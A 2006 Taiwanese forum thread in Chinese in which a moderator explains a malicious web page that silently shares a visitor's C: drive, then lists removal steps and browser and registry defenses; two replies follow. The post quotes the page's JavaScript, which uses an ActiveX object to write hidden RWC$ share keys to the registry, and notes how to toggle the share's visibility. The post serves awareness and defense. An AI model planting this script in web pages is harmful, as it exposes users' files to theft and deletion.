廣告廣告
  加入我的最愛 設為首頁 風格修改
首頁 首尾
 手機版   訂閱   地圖  簡體 
您是第 7049 個閱讀者
 
發表文章 發表投票 回覆文章
  可列印版   加為IE收藏   收藏主題   上一主題 | 下一主題   
upside 手機 葫蘆墩家族
個人頭像
個人文章 個人相簿 個人日記 個人地圖
特殊貢獻獎 社區建設獎 優秀管理員勳章
頭銜:反病毒 反詐騙 反虐犬   反病毒 反詐騙 反虐犬  
版主
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片
推文 x0
[資訊教學] 瀏覽網頁硬碟被共享
現在上網真是不安全,前一陣子鬧得最凶的是“萬花谷”,如果進入該網頁瀏覽者注冊表會被修改,好多系統功能因此受到限
製。最近又聽說有網友在瀏覽網頁時硬碟被共享,危害似乎更大!

  其實,所謂的瀏覽網頁硬碟被共享,和“萬花谷”一樣,受害者都是在瀏覽了含有有害代碼的ActiveX網頁文件後中招的。
以下是該網頁原代碼中的關鍵部分﹕

script language=JavaScript

document.write("");
function f(){

a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Network\\LanMan\\RWC$\\Flags",302,"REG_DWORD"
);
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion
\\Network\\LanMan\\ RWC$\\Type",0,"REG_DWORD"
);
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\
LanMan\\RWC$\\Path","C:\\"
);
}
function init()
{
setTimeout("f()", 1000);

}

init();
/script

  注意﹕以“Shl.RegWrite”開頭的這幾句代碼的作用是寫入瀏覽者的注冊表,在HKEY_LOCAL_MACHINE\Software\Microsoft
\Windows\CurrentVersion\Network\LanMan下面添加鍵值“RWC$” ,在RWC$”下又分別建立鍵值“Flags”、“Type”
“Path”,這樣就把c盤設為共享了,共享名為RWC$。而且你在網絡屬性中還看不到硬碟被共享了!如果
把"Flags"=dword:00000302改成"Flags"=dword:00000402就可看到硬碟被共享。

  由於只要瀏覽這類網頁硬碟即被共享,因此其危害較之木馬更大(個人觀點)。如果不小心中招,那麼給你下套的人完全
可以把你的硬碟當做他的一個邏輯硬碟,他可以在你電腦中隨意拷貝文件,刪除文件,給文件改名……如果這樣還不能令他滿
意,他完全可以給你再下個木馬(哦,錯了!不是一個、是一群木馬),那樣你就生不如死了,什麼秘密都沒有了﹕上網賬
號、QQ密碼、給MM的信件……如果他高興還可以格式化你的硬碟,或者是在你的電腦中運行“江民炸彈”之類的軟件破壞你
的硬碟。總之,你的一切都在他的掌握之下了,想想夠可怕了吧?


  解決辦法﹕把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面的“RWC$”刪掉。
狠一點的,也可以把windows\system\下面的Vserver.vxd(Microsoft 網絡上的文件與打印機共享,虛擬設備驅動程序)刪掉,再把
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\下的Vserver鍵值刪掉,永絕這類“木馬”的後路吧。

  防御防範﹕

  1、不要輕易去一些自己並不了解的站點,特別是那些看上去美麗誘人的網址更不要貿然前往,否則吃虧的往往是你。
  2、運行IE,點擊“工具→Internet選項→安全→Internet區域的安全級別,把安全極別由“中”改為“高”
  3、由於該類網頁是含有有害代碼的ActiveX網頁文件,因此在IE設置中將ActiveX插件和控件、Java腳本等全部禁止就可以
避免中招。具體方法是﹕在IE窗口中點擊“工具→Internet選項,在彈出的對話框中選擇“安全”標簽,再點擊“自定義級別”
按鈕,就會彈出“安全設置”對話框,把其中所有ActiveX插件和控件以及Java相關全部選擇“禁用”即可。不過,這樣做在以
後的網頁瀏覽過程中可能會造成一些正常使用ActiveX的網站無法瀏覽。唉,有利就有弊,你還是自己看著辦吧。
  4、對於Windows98用戶,請打開C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP,把其中的“ActiveXComponent.class”刪掉;
對於WindowsMe用戶,請打開C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP,把其中的“ActiveXComponent.class”刪掉。請放心,
刪除這個組件不會影響到你正常瀏覽網頁的。
  5、既然這類網頁是通過修改注冊表來破壞我們的系統,那麼我們可以事先把注冊表加鎖﹕禁止修改注冊表,這樣就可以
達到預防的目的。不過,自己要使用注冊表編輯器regedit.exe該怎麼辦呢?因此我們還要在此前事先準備一把“鑰匙”,以便打
開這把“鎖”!

  加鎖方法如下﹕
  (1)運行注冊表編輯器regedit.exe;
  (2)展開注冊表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下,新建一個名為
DisableRegistryTools的DWORD值,並將其值改為“1”,即可禁止使用注冊表編輯器regedit.exe。

  解鎖方法如下﹕
  用記事本編輯一個任意名字的.reg文件,比如unlock.reg,內容如下﹕

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

  存盤。你就有了一把解鎖的鑰匙了!如果要使用注冊表編輯器,則雙擊unlock.reg即可。要注意的是,在“REGEDIT4”後
面一定要空一行,並且“REGEDIT4”中的“4”和“T”之間一定不能有空格,否則將前功盡棄!

  6、安裝網絡防火牆,特別是安裝了Norton2001後,進入該類網頁就會報警提示有腳本寫注冊表,國產反病毒軟件
KVW3000也有此類功效,建議你也安裝一個這樣的軟件。
  7、雖然經過一番辛苦的勞動修改回了標題和默認連接首頁,但如果以後又不小心進入該站就又得麻煩一次。其實,你可
以在IE中做一些設置以便永遠不進該站點﹕
打開IE,點擊“工具”→“Internet選項”→“內容”→“分級審查”,點“啟用”按鈕,會調出“分級審查”對話框,然後點
擊“許可站點”標簽,輸入不想去的網站網址,如輸入﹕http://www.sohu8.com,按“從不”按鈕,再點擊“確定”即大功告
成!



爸爸 你一路好走
獻花 x0 回到頂端 [樓 主] From:台灣 | Posted:2006-10-24 18:04 |
roger70609
個人文章 個人相簿 個人日記 個人地圖
小人物
級別: 小人物 該用戶目前不上站
推文 x0 鮮花 x11
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片

哇~~
原來有這麼恐怖的事情喔@@


獻花 x0 回到頂端 [1 樓] From:台灣中華電信 | Posted:2006-10-24 20:02 |
sang 會員卡
個人文章 個人相簿 個人日記 個人地圖
特殊貢獻獎
知名人士
級別: 知名人士 該用戶目前不上站
推文 x49 鮮花 x4916
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片

@@".upside版主提供的好詳細哦. 表情 的確,因為很多人沒有留意瀏覽網頁時已經網頁指令的指向改變了本身的ie設定.所以有時我們也必須常去注意防毒之外的
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion 下的設定是不是被人動了手腳,現在已經不是單純的改變某幾個檔案而已了..


獻花 x0 回到頂端 [2 樓] From:台灣數位聯合 | Posted:2006-10-24 20:11 |

首頁  發表文章 發表投票 回覆文章
Powered by PHPWind v1.3.6
Copyright © 2003-04 PHPWind
Processed in 0.070622 second(s),query:16 Gzip disabled
本站由 瀛睿律師事務所 擔任常年法律顧問 | 免責聲明 | 本網站已依台灣網站內容分級規定處理 | 連絡我們 | 訪客留言